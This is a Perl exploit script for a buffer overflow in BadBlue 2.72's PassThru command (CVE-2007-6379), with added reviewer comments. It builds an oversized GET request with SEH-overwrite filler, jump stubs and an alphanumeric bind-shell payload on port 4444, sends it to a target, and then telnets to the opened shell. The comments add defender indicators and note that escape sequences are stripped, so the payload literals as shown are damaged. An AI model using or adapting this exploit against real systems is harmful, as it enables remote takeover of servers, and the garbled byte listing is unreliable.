# Title : BadBlue 2.72 PassThru Remote Buffer Overflow Exploit
# Published : 2007-12-24
# Author : Jacopo Cervini
#!/usr/bin/perl -w
# http://aluigi.altervista.org/adv/badblue-adv.txt
# http://www.securityfocus.com/bid/26803
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379
# Exploit for the stack overflow in BadBlue 2.72 (PassThru command of ext.dll, CVE-2007-6379)
#
# Credit to Luigi Auriemma
# Jacopo Cervini acaro@jervus.it
# 22/12/2007
#
#
#
use IO::Socket;
# Argument check: the script expects a target host in $ARGV[0] and a TCP port
# in $ARGV[1]. Only $ARGV[1] is tested, and only for truthiness, so a missing
# port, an empty string, or the literal "0" all take the usage branch.
if(!($ARGV[1]))
{
# NOTE(review): the trailing "nn" is printed literally as this page renders it;
# presumably it was a pair of newlines in the original posting.
print "Usage: badblue-272-seh.pl <victim> <port>nn";
# Bare exit: the process ends with status 0 even though nothing was done.
exit;
}
# Payload blob, kept exactly as published. Author's generator note:
# metasploit win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
# Going by that note this is a bind-shell payload that listens on TCP 4444 on
# the target; the script later connects to that same port.
# Defender view: a new listener on TCP/4444 owned by the BadBlue web-server
# process, or an inbound connection to that port right after a request to
# /ext.dll, is the post-exploitation indicator to alert on. Inbound filtering
# of non-service ports on the web host blocks this particular payload.
# NOTE(review): as rendered on this page the literals below contain no escape
# sequences, so they are printable text rather than the byte values the
# generator note describes. Do not derive byte-level signatures from this
# listing without checking it against the referenced advisories.
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e".
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38".
"x4ex46x46x52x46x42x4bx48x45x34x4ex53x4bx48x4ex57".
"x45x50x4ax47x41x50x4fx4ex4bx58x4fx54x4ax41x4bx48".
"x4fx45x42x52x41x30x4bx4ex49x34x4bx58x46x33x4bx48".
"x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x38x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e".
"x46x4fx4bx53x46x45x46x32x4ax52x45x37x45x4ex4bx38".
"x4fx35x46x52x41x30x4bx4ex48x36x4bx58x4ex30x4bx54".
"x4bx58x4fx45x4ex31x41x50x4bx4ex43x50x4ex42x4bx38".
"x49x58x4ex46x46x52x4ex31x41x46x43x4cx41x53x4bx4d".
"x46x56x4bx58x43x44x42x33x4bx48x42x54x4ex30x4bx38".
"x42x57x4ex51x4dx4ax4bx58x42x54x4ax50x50x45x4ax46".
"x50x48x50x34x50x30x4ex4ex42x35x4fx4fx48x4dx48x56".
"x43x35x48x46x4ax56x43x43x44x43x4ax36x47x47x43x57".
"x44x33x4fx45x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e".
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x38x45x4e".
"x48x36x41x58x4dx4ex4ax30x44x30x45x55x4cx36x44x50".
"x4fx4fx42x4dx4ax46x49x4dx49x30x45x4fx4dx4ax47x55".
"x4fx4fx48x4dx43x45x43x55x43x45x43x35x43x55x43x34".
"x43x45x43x44x43x45x4fx4fx42x4dx48x36x4ax56x41x51".
"x4ex35x48x46x43x35x49x38x41x4ex45x39x4ax46x46x4a".
"x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx36x42x51".
"x41x35x45x55x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x42".
"x49x4ex47x35x4fx4fx48x4dx43x35x45x55x4fx4fx42x4d".
"x4ax46x45x4ex49x44x48x48x49x34x47x55x4fx4fx48x4d".
"x42x35x46x35x46x35x45x45x4fx4fx42x4dx43x49x4ax56".
"x47x4ex49x57x48x4cx49x47x47x55x4fx4fx48x4dx45x45".
"x4fx4fx42x4dx48x56x4cx56x46x56x48x56x4ax46x43x46".
"x4dx46x49x38x45x4ex4cx46x42x55x49x55x49x32x4ex4c".
"x49x38x47x4ex4cx36x46x34x49x58x44x4ex41x33x42x4c".
"x43x4fx4cx4ax50x4fx44x34x4dx52x50x4fx44x34x4ex42".
"x43x59x4dx58x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax56".
"x44x37x50x4fx43x4bx48x51x4fx4fx45x47x46x44x4fx4f".
"x48x4dx4bx35x47x45x44x55x41x55x41x55x41x55x4cx56".
"x41x50x41x45x41x35x45x45x41x55x4fx4fx42x4dx4ax56".
"x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46".
"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx58x47x55x4ex4f".
"x43x38x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d".
"x4ax46x42x4fx4cx48x46x50x4fx35x43x55x4fx4fx48x4d".
"x4fx4fx42x4dx5a";
# Main flow: open one TCP connection to the host/port given on the command
# line, send a single oversized GET request for the BadBlue ext.dll PassThru
# command, close the socket, then run telnet against port 4444 of the same host.
#
# Defender view: the network-visible artefact is one HTTP request whose URI
# starts with "/ext.dll?mfcisapicommand=PassThru&" and whose query string runs
# to well over 3000 characters of filler and payload. A query-string length
# limit at a reverse proxy or WAF, or a rule on that URI prefix combined with
# an abnormal length, covers this request shape without relying on the exact
# payload bytes. The durable fix is to retire or update BadBlue 2.72 as
# described in the advisories linked in the file header.
#
# NOTE(review): the string literals in this block carry no escape sequences as
# this page renders them (compare the literal "n" and "rnrn" endings), so the
# listing is a damaged historical record rather than a faithful copy.

# Connect to the target; die with a message if the TCP connection fails.
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "can't connect to $ARGV[0] on port $ARGV[1]";
# Filler strings built with the repetition operator (string x count).
$pad0 = "x41"x407;
$pad = "x41"x3000;
# Author's annotation: this value is the address of a pop/pop/ret sequence in
# ext.dll. Together with the script name (badblue-272-seh.pl), that indicates
# the overflow is aimed at a structured-exception-handler record.
$seh = "xb6x34x03x10"; # pop ebx pop ecx ret in ext.dll
# Two short control-transfer stubs, named by the author as a short jump and a
# long jump; the script only concatenates them into the request.
$jmp = "x90x90xebx08";
$longjmp = "xe9x6exf1xffxff";
# Trailing filler.
$pad1 = "x43"x8;
$pad2 = "x43"x59;
# Assemble the full request line: fixed URI prefix, then filler, payload,
# filler, the stubs and the handler value, then the HTTP version and the
# header terminator.
$exploit = "GET /ext.dll?mfcisapicommand=PassThru&". $pad0 . $shellcode . $pad . $jmp . $seh . $pad1 .$longjmp . $pad2. "HTTP/1.0"."rnrn";
# Send the request over the socket; no response is read back.
print $victim $exploit;
print " + Malicious GET request sent ...n";
sleep(1);
print "Done.n";
close($victim);
$host = $ARGV[0];
print " + Connect on port 4444 of $host ...n";
sleep(2);
# Follow-up connection to TCP 4444, the port named in the payload's generator
# note. On the defended side this appears as an inbound connection to a
# non-service port shortly after the HTTP request above.
# NOTE(review): $host is taken straight from @ARGV and interpolated into a
# shell command string; the list form of system() would keep a crafted
# argument from being interpreted by the shell.
system("telnet $host 4444");
exit;